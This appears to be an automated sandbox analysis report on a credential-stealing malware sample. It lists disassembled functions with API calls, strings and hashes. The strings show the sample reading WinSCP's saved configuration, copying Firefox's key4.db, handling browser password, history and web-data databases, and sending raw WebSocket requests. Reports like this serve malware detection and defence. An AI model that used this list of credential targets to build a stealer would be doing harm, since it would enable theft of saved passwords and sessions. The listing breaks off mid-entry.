Instruction ID: 402193ce10dc7b42423248ea00b3435e4141f7d6161ca5b4c01f9afd4d615bc0
Opcode Fuzzy Hash: e0d7cceb4d819f9284b24f4595ddcfb05509cb9f4bd70c7d53174018c756231b
Instruction Fuzzy Hash: FFF10775301300AFC755DB5CEC95A69B7EBBF882867480068E826C7362DB70ED64DF18

Function 0041F015 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0041F031
memset.MSVCRT ref: 0041F04A
memset.MSVCRT ref: 0041F05B
memset.MSVCRT ref: 0041F06C
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041F0B4

Strings

Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0041F094, 0041F09A, 0041F0AE

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: memset$Open
String ID: Software\Martin Prikryl\WinSCP 2\Configuration
API String ID: 276825008-2822339690
Opcode ID: 55ca331583c1b56da4eda0f163f524fd814237aa015647e50c31af739886e312
Instruction ID: 67e5a23803197c295e594884a1bcfb30543c02150a40f664988b08af0becf682
Opcode Fuzzy Hash: 55ca331583c1b56da4eda0f163f524fd814237aa015647e50c31af739886e312
Instruction Fuzzy Hash: E911B6B2D00224ABD710DBA6DC49DCB3BBCEB86314F04002EF518D7242EA749E04CBE6

Function 0041BC58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 178
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 0041BE5A

Strings

HTTP/1.1Host: , xrefs: 0041BCD3, 0041BCD9, 0041BCEA
GET , xrefs: 0041BC99, 0041BC9F, 0041BCBB
Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 0041BD68, 0041BD6E, 0041BD82
Sec-WebSocket-Version: 13, xrefs: 0041BDB3, 0041BDB9, 0041BDCD

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: send
String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET
API String ID: 2809346765-3104479224
Opcode ID: cbc5bc4946d98ffa555f3a1d77012afb07b064be0202adbf9545ba350e3e99e9
Instruction ID: 8ed605f06c46fc60804accb197c5789d50c680f39d24823af872ce5175c4c2c2
Opcode Fuzzy Hash: cbc5bc4946d98ffa555f3a1d77012afb07b064be0202adbf9545ba350e3e99e9
Instruction Fuzzy Hash: EB5161722003009FC264CB6CEC91E9A77EAEFD9215F09452DE51AD3362DE74EE18C769

Function 00426F71 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 193
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0042717E

Strings

d=E, xrefs: 0042702B
d=E, xrefs: 00426F83
\key4.db, xrefs: 00426FC3, 00426FC9, 00426FE1

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CopyFile
String ID: \key4.db$d=E$d=E
API String ID: 1304948518-1705763178
Opcode ID: 3e3d83680770a654f3bf792a03ff31a7bfc5ec998db6146819a07833e286aeb1
Instruction ID: 4821812f8bf7a8a1f99ca581dd5a92acd23b7366e59edd698fe43bc3c08f3827
Opcode Fuzzy Hash: 3e3d83680770a654f3bf792a03ff31a7bfc5ec998db6146819a07833e286aeb1
Instruction Fuzzy Hash: 8A71E07AB003188FC708DF9DDC80E9977FAEF992147094665E81AD7372D624EE04CB68

Function 0043AD20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNEL32(00000000), ref: 0043AE6A
CopyFileA.KERNEL32(?,00000000,00000001), ref: 0043AE92
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AEBF

Strings

Xy'I, xrefs: 0043AED6

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$CopyDeleteUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: Xy'I
API String ID: 3134562156-2702762207
Opcode ID: e45210d9fde4f21fae835b6d678c2a5a97ef2876d71ea2cc5f4696ef12bc7a48
Instruction ID: 8fc67030b0a7aa72092dac6407433eb7b1cfde439f72d62168c11223eba465b1
Opcode Fuzzy Hash: e45210d9fde4f21fae835b6d678c2a5a97ef2876d71ea2cc5f4696ef12bc7a48
Instruction Fuzzy Hash: C4510CB5A00214CFCB14CFACDDA5E9973F6AF9920670A4265B809D73A2C670FD45CF4A

Function 0041CDEB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0041CE19
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0041CF32
DeleteFileA.KERNEL32(00000000), ref: 0041CF4E

Strings

_passwords.db, xrefs: 0041CEA3, 0041CEA9, 0041CEAF

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocateDeleteFileFree
String ID: _passwords.db
API String ID: 2485951164-1485422284
Opcode ID: d57cab47d7dac18adc9d6d2c496fd208eb3d593c7402750c20951bb7bf1397fe
Instruction ID: f41fdeda9dfe8104a1f94bef4917f754430451c26a97d7c1a4403d231b0f3285
Opcode Fuzzy Hash: d57cab47d7dac18adc9d6d2c496fd208eb3d593c7402750c20951bb7bf1397fe
Instruction Fuzzy Hash: 284136B5A002069FDB04DF99EC81CBA77F9FF88602705146DE816E7326DB75ED018B98

Function 0042DDE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0042DDFF
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119), ref: 0042DE44

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0042DE29, 0042DE2F, 0042DE3E

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Openmemset
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 180050240-1514646153
Opcode ID: 433b175eee3944dde828781b544b9bf3f7d44eb40bdad21b233979a260885154
Instruction ID: 46ac7e183783d86e26adb07f5837e5492789bf38a844fde72eafafbba06e7dc8
Opcode Fuzzy Hash: 433b175eee3944dde828781b544b9bf3f7d44eb40bdad21b233979a260885154
Instruction Fuzzy Hash: 10F0C2B5601214ABD224DF25DD86D2B7B6CDB86300B05832CF80887742EA34DD24C6A6

Function 0042E301 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0042E378

Strings

%s\%s, xrefs: 0042E33F, 0042E345, 0042E354
;srd, xrefs: 0042E334

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Open
String ID: %s\%s$;srd
API String ID: 71445658-2204126839
Opcode ID: 5715ebb85eaa2e2521c68a54905a19c2296a1ce0cb5a182603e9e781fb9c67b6
Instruction ID: 34b2e5b33d945873e4262bdd04268051d0e0910bc24028fb715f720baead2621
Opcode Fuzzy Hash: 5715ebb85eaa2e2521c68a54905a19c2296a1ce0cb5a182603e9e781fb9c67b6
Instruction Fuzzy Hash: 1A0148B5601315AFD310EF18DC81E577BA8EBA8305F26092AF804D7322D730E9508B96

Function 00437564 Relevance: 4.7, APIs: 3, Instructions: 193networkCOMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00437645
InternetOpenA.WININET ref: 004376E6
InternetOpenA.WININET ref: 00437719

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InternetOpen$CreateDirectory
String ID:
API String ID: 1348255353-0
Opcode ID: 052c9a79ab832bceee9035961e942eb2d2dc11a68678d48afda5f8c5773ba6e1
Instruction ID: 3513c12a8c15c838cc1135bd79a6dff85458f3f9f28c4c03711eeead7ed662cc
Opcode Fuzzy Hash: 052c9a79ab832bceee9035961e942eb2d2dc11a68678d48afda5f8c5773ba6e1
Instruction Fuzzy Hash: BA71F972E002148BDB25DF6CDD81AA9B3F1BF88205F04457DE81AD3352DB34EA59CB5A

Function 0041533B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(?), ref: 00415350

Strings

\?&:t@&:, xrefs: 0041533B

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandleInternet
String ID: \?&:t@&:
API String ID: 1081599783-2465286858
Opcode ID: fc56006f293327a4f9b346781327c1f277752a6840ab44ac0c6583ad21490ae5
Instruction ID: d09f45f6c24540c2dcfb769578196fc595e377ba579bf386f75a8b3639b3103a
Opcode Fuzzy Hash: fc56006f293327a4f9b346781327c1f277752a6840ab44ac0c6583ad21490ae5
Instruction Fuzzy Hash: F741E3766052189FCB11DFACEC84AA9B3B4FF88346B440464E916D7776DA31EE18CB48

Function 00424D52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000), ref: 00424E63

Strings

_history.db, xrefs: 00424DCF, 00424DD5, 00424DE5, 00424DEA

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DeleteFile
String ID: _history.db
API String ID: 4033686569-1957735733
Opcode ID: fd00fecaafae3e86381897c3d74b3fe11c3242cbc2d066c7f45a6775889170b6
Instruction ID: 664919f2f9941c2fd957c57035283161ac0d3c89977a26e28749c9f04641afb9
Opcode Fuzzy Hash: fd00fecaafae3e86381897c3d74b3fe11c3242cbc2d066c7f45a6775889170b6
Instruction Fuzzy Hash: 0941FFB5A002098FCB14CF9CDC81AED77F5EF88205F18852DD815E7316EA74EA45CB54

Function 00424A51 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000), ref: 00424B4F

Strings

_webdata.db, xrefs: 00424AC3, 00424AC9, 00424AD9

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DeleteFile
String ID: _webdata.db
API String ID: 4033686569-3003761311
Opcode ID: 4247e945059a56421f7bdb963986c24b22db16c1a19c725eeef54cf5587253da
Instruction ID: db05b673def4e00113b8eb769639559526f8ca15c5f04c734e0a0b142f73cbf0
Opcode Fuzzy Hash: 4247e945059a56421f7bdb963986c24b22db16c1a19c725eeef54cf5587253da
Instruction Fuzzy Hash: B541F7B2A002199BCB45CF9CDC81ADD77F4BF89205B044039E815E7312EB34EA59CB99

Function 0042E40C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,?,00000000,?,?), ref: 0042E4DD

Strings

vsrd, xrefs: 0042E41E

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID: vsrd
API String ID: 3660427363-1852917856
Opcode ID: 0c21e595cdf6e65eb1b6d17ee60a0a8cbb5b6d2b486b3466969e5a2303e3c7e0
Instruction ID: 828b0b05ebcd48e66b62258adcb900599b6b0af2b19d4c7bd69145f2f8c69973
Opcode Fuzzy Hash: 0c21e595cdf6e65eb1b6d17ee60a0a8cbb5b6d2b486b3466969e5a2303e3c7e0
Instruction Fuzzy Hash: 2B21F6B6300204AFC304EF49EC80E2A77E5EBD9205B56493DF806C7362DA30EA599B56

Function 0043B109 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 0043B1B9

Strings

Xy'I, xrefs: 0043B1D3

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindNext
String ID: Xy'I
API String ID: 2029273394-2702762207
Opcode ID: ce83ed4ba58897fbe59314eb7d129d3d1d76a4be647b3bea7fe25ddbea4cfa22
Instruction ID: d19c6fc699663f9f609ad4f0e67f3bf44e49985e7a60a2aa20ba03075b608dbe
Opcode Fuzzy Hash: ce83ed4ba58897fbe59314eb7d129d3d1d76a4be647b3bea7fe25ddbea4cfa22
Instruction Fuzzy Hash: 3521B7B4E00759CFDB50CF69C981A9AB7F0FF49300F008669E959A7352E730A980CF95

Function 0042E829 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32 ref: 0042E867

Strings

C, xrefs: 0042E829

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
